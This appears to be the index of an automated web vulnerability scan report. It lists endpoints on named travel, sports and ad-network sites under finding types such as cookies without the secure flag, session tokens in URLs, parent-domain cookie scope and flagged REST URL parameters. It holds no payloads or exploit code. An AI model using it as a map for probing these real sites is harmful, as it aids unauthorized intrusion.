8.107. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 1]

8.108. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 2]

8.109. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 3]

8.110. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 4]

8.111. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 5]

8.112. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 1]

8.113. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 2]

8.114. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 3]

8.115. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 4]

8.116. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 5]

8.117. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 1]

8.118. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 2]

8.119. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 3]

8.120. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 4]

8.121. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 5]

8.122. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 1]

8.123. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 2]

8.124. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 3]

8.125. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 4]

8.126. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 5]

8.127. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 1]

8.128. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 2]

8.129. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 3]

8.130. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 4]

8.131. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 5]

8.132. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 1]

8.133. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 2]

8.134. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 3]

8.135. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 4]

8.136. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 5]

8.137. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 1]

8.138. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 2]

8.139. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 3]

8.140. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 4]

8.141. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 5]

8.142. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 1]

8.143. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 2]

8.144. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 3]

8.145. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 4]

8.146. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 5]

8.147. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 1]

8.148. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 2]

8.149. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 3]

8.150. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 4]

8.151. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 5]

8.152. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 1]

8.153. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 2]

8.154. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 3]

8.155. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 4]

8.156. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 5]

8.157. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 1]

8.158. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 2]

8.159. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 3]

8.160. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 4]

8.161. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 5]

8.162. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 1]

8.163. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 2]

8.164. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 3]

8.165. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 4]

8.166. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 5]

8.167. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 1]

8.168. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 2]

8.169. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 3]

8.170. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 4]

8.171. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 5]

8.172. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 1]

8.173. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 2]

8.174. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 3]

8.175. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 4]

8.176. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 5]

8.177. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 1]

8.178. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 2]

8.179. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 3]

8.180. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 4]

8.181. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 5]

8.182. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 6]

8.183. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 1]

8.184. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 2]

8.185. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 3]

8.186. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 4]

8.187. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 5]

8.188. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 1]

8.189. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 2]

8.190. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 3]

8.191. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 4]

8.192. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 1]

8.193. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 2]

8.194. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 3]

8.195. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 4]

8.196. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 1]

8.197. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 2]

8.198. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 3]

8.199. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 4]

8.200. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 1]

8.201. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 2]

8.202. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 3]

8.203. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 4]

8.204. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 5]

8.205. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 1]

8.206. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 2]

8.207. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 3]

8.208. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 4]

8.209. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 5]

8.210. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 6]

8.211. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif [REST URL parameter 1]

8.212. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]

8.213. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]

8.214. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]

8.215. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 1]

8.216. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 2]

8.217. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 3]

8.218. http://wac.edgecastcdn.net/800003/origin.edgecast.com/cx/cdx10b.js [REST URL parameter 1]

8.219. http://wac.edgecastcdn.net/800003/origin.edgecast.com/cx/cdx10b.js [REST URL parameter 2]

8.220. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 1]

8.221. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 2]

8.222. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 3]

8.223. http://www.nike.com/nikefootball/home/twitterfeed [REST URL parameter 3]

8.224. http://www.tripadvisor.com/Commerce [src parameter]

9. SSL cookie without secure flag set

9.1. https://go.americanexpress-travel.com/SSOAuthenticateResponse.do

9.2. https://go.americanexpress-travel.com/hotel/HotelAvailability.do

9.3. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

9.4. https://secure.mlb.com/resetPassword.do

9.5. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp

9.6. https://secure.mlb.com/style/bam.css.jsp

9.7. https://secure.mlb.com/style/nav_2011.jsp

9.8. https://www.hotelplanner.com/Accept/Reserve.cfm

10. Session token in URL

10.1. http://a.intentmedia.net/adServer/impressions

10.2. http://bh.contextweb.com/bh/set.aspx

10.3. http://cert.travelocity.com/___waseq.img

10.4. http://cm.g.doubleclick.net/pixel

10.5. http://cm.g.doubleclick.net/pixel

10.6. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

10.7. http://gcm.chango.com/collector/relator

10.8. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

10.9. http://l.sharethis.com/pview

10.10. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif

10.11. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

10.12. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

10.13. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard

10.14. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard

10.15. http://rs.gwallet.com/r1/pixel/x1743

10.16. http://travel.travelocity.com/___waseq.img

10.17. http://travel.travelocity.com/hotel/HotelAvailability.do

10.18. http://travel.travelocity.com/hotel/HotelDetail.do

10.19. http://travel.travelocity.com/pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html

10.20. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

10.21. http://travel.travelocity.com/pub/gwt/hotel/esf/hotelresultlist.gwt-rpc

10.22. http://travela.priceline.com/hotel/leaveBehindPop.do

10.23. http://travela.priceline.com/hotel/newHotelSearch.do

10.24. http://travela.priceline.com/hotel/searchHotels.do

10.25. http://travela.priceline.com/hotel/searchResults.do

10.26. http://travelocity.tt.omtrdc.net/m2/travelocity/mbox/standard

10.27. http://www.facebook.com/extern/login_status.php

10.28. http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp

10.29. http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp

10.30. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

10.31. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

11. Password field submitted using GET method

12. ASP.NET ViewState without MAC enabled

13. Cookie scoped to parent domain

13.1. http://api.twitter.com/1/statuses/user_timeline.json

13.2. http://as00.estara.com/fs/rules.php

13.3. https://secure.mlb.com/resetPassword.do

13.4. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp

13.5. https://secure.mlb.com/style/bam.css.jsp

13.6. https://secure.mlb.com/style/nav_2011.jsp

13.7. http://travela.priceline.com/hotel/leaveBehindPop.do

13.8. http://travela.priceline.com/hotel/searchHotels.do

13.9. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

13.10. http://www.expedia.com/Details

13.11. http://www.expedia.com/Hotel-Search

13.12. http://www.expedia.com/Hotel-Search-WidgetInitJS

13.13. http://www.expedia.com/Hotels/Offers

13.14. http://www.expedia.com/Hotels/Offers

13.15. http://www.getaroom.com/

13.16. http://www.getaroom.com/browse/market_deals

13.17. http://www.getaroom.com/searches/show

13.18. http://www.getaroom.com/washington-dc

13.19. http://www.priceline.com/QP.asp

13.20. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

13.21. http://www.tripadvisor.com/CheckMore

13.22. http://www.tripadvisor.com/Commerce

13.23. http://www.tripadvisor.com/HotelCheckRates

13.24. http://www.tripadvisor.com/SmartDeals-g1-m11893

13.25. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

13.26. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e5.0-13878-5.gif

13.27. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/3.0-11539-1.gif

13.28. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif

13.29. http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif

13.30. http://www.tripadvisor.com/img/cdsi/partner/tripAdvisorLogo-11007-0.gif

13.31. http://a.collective-media.net/adj/cm.guardian/

13.32. http://a.collective-media.net/cmadj/cm.guardian/

13.33. http://a.tribalfusion.com/displayAd.js

13.34. http://a.tribalfusion.com/i.cid

13.35. http://a.tribalfusion.com/j.ad

13.36. http://a.tribalfusion.com/z/i.cid

13.37. http://ad.doubleclick.net/ad/N270.N270.EMEA_StratDev/B3867719.15

13.38. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

13.39. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

13.40. http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49

13.41. http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2

13.42. http://ad.doubleclick.net/adj/N4610.153021.INTERCLICKNETWORK/B5581164.6

13.43. http://ad.doubleclick.net/adj/gna.en/level2

13.44. http://ad.doubleclick.net/clk

13.45. http://ads.pointroll.com/PortalServe/

13.46. http://ads2.adbrite.com/v0/ad

13.47. http://adserver.teracent.net/tase/ad

13.48. http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php

13.49. http://api.wipmania.com/jsonp

13.50. http://apis.google.com/js/plusone.js

13.51. http://ar.voicefive.com/b/wc_beacon.pli

13.52. http://ar.voicefive.com/bmx3/broker.pli

13.53. http://as.chango.com/links/adunit/1.31759988192e+12

13.54. http://as00.estara.com/fs/ruleaction.php

13.55. http://as00.estara.com/fs/rules.php

13.56. http://asset.userfly.com/users/20826/userfly.js

13.57. http://ats.tumri.net/ats/ats

13.58. http://b.scorecardresearch.com/b

13.59. http://b.scorecardresearch.com/p

13.60. http://b.scorecardresearch.com/r

13.61. http://b.voicefive.com/b

13.62. http://bh.contextweb.com/bh/rtset

13.63. http://bh.contextweb.com/bh/set.aspx

13.64. http://bid.openx.net/json

13.65. http://cas.criteo.com/delivery/admeld_map

13.66. http://clk.atdmt.com/go/352348532/direct

13.67. http://d.agkn.com/iframe!t=1168!

13.68. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

13.69. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/

13.70. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/

13.71. http://d.xp1.ru4.com/meta

13.72. http://d7.zedo.com/img/bh.gif

13.73. http://ehg-twi.hitbox.com/HG

13.74. http://ehg-twi.hitbox.com/HGct

13.75. http://ff.connextra.com/BlueSquare/selector/client

13.76. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/

13.77. http://i.w55c.net/ping_match.gif

13.78. http://image2.pubmatic.com/AdServer/Pug

13.79. http://images.hotelplanner.com/hotelimages/s/028000/028920A-thumb.jpg

13.80. http://int.teracent.net/tase/int

13.81. http://int.teracent.net/tase/int

13.82. http://leadback.advertising.com/adcedge/lb

13.83. http://leadback.hotwire.db.advertising.com/adcedge/lb

13.84. http://lm.trafficmp.com/clicksense/pixel

13.85. http://loadm.exelator.com/load/

13.86. http://m.xp1.ru4.com/ad

13.87. http://m.xp1.ru4.com/meta

13.88. http://m.xp1.ru4.com/meta

13.89. http://m.xp1.ru4.com/meta

13.90. http://o-va1.wtp101.com/imp

13.91. http://o-va3.wtp101.com/imp

13.92. http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js

13.93. http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js

13.94. http://optimized-by.rubiconproject.com/a/7743/12359/21900-9.js

13.95. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

13.96. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

13.97. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

13.98. http://optimized-by.rubiconproject.com/a/8154/13209/25051-1.js

13.99. http://optimized-by.rubiconproject.com/a/8154/13209/25051-15.js

13.100. http://optimized-by.rubiconproject.com/a/8154/13209/25051-8.js

13.101. http://optimized-by.rubiconproject.com/a/dk.js

13.102. http://pixel.rubiconproject.com/di.php

13.103. http://pixel.rubiconproject.com/tap.php

13.104. http://r.openx.net/set

13.105. http://r.turn.com/r/beacon

13.106. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

13.107. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

13.108. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

13.109. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

13.110. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.111. http://r1-ads.ace.advertising.com/site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.112. http://r1-ads.ace.advertising.com/site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

13.113. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

13.114. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.115. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.116. http://rs.gwallet.com/r1/pixel/x1743

13.117. http://rs.gwallet.com/r1/pixel/x914r7675757

13.118. http://safebrowsing.clients.google.com/safebrowsing/downloads

13.119. http://sales.liveperson.net/hc/15744040/

13.120. http://servedby.flashtalking.com/click/1/16628

13.121. http://servedby.flashtalking.com/imp/1/16628

13.122. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.125. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.126. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.127. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.132. http://tag.contextweb.com/TagPublish/GetAd.aspx

13.133. http://tap.rubiconproject.com/oz/feeds/targus/profile

13.134. http://tap.rubiconproject.com/oz/sensor

13.135. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

13.136. http://travel.travelocity.com/hotel/HotelAvailability.do

13.137. http://travel.travelocity.com/hotel/HotelCobrand.do

13.138. http://travel.travelocity.com/hotel/HotelDetail.do

13.139. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

13.140. http://travela.priceline.com/sharedapps/scs

13.141. http://u.openx.net/w/1.0/sc

13.142. http://user.lucidmedia.com/clicksense/user

13.143. http://uxm.thousandeyes.com/rest/json

13.144. http://vitamine.networldmedia.net/bts/generic14.php

13.145. http://www.agoda.com/partners/partnersearch.aspx

13.146. http://www.booking.com/general.en-us.html

13.147. http://www.booking.com/hotel/us/c-boston-massachusettes.html

13.148. http://www.booking.com/hotel/us/copley-square.en-us.html

13.149. http://www.booking.com/index.en-us.html

13.150. http://www.booking.com/logo

13.151. http://www.booking.com/searchresults.html

13.152. http://www.cheaptickets.com/shop/hotelsearch

13.153. http://www.expedia.com/Hotel-Search

13.154. http://www.expedia.com/TripPreferences

13.155. http://www.expedia.com/daily/common/mscookie.aspx

13.156. http://www.expedia.com/pubspec/scripts/eap.asp

13.157. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

13.158. http://www.hotels.com/PPCHotelDetails

13.159. http://www.hotels.com/PPCSearch

13.160. http://www.hotels.com/compare/hotel_dockingbar.html

13.161. http://www.hotels.com/hotel/details.html

13.162. http://www.hotels.com/hotel/hoteldata.html

